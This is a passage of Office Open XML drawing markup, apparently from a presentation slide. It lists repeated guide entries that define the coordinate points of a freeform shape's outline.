              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 265826 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 258031 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 319080 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 345956 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375505 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 408998 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 438184 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 441487 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 455016 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY102" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY103" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY104" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 151770 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 265826 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 258031 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 319080 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 345956 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375505 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 423664 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 438184 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 441487 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 455016 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY102" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY103" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY104" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 151770 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
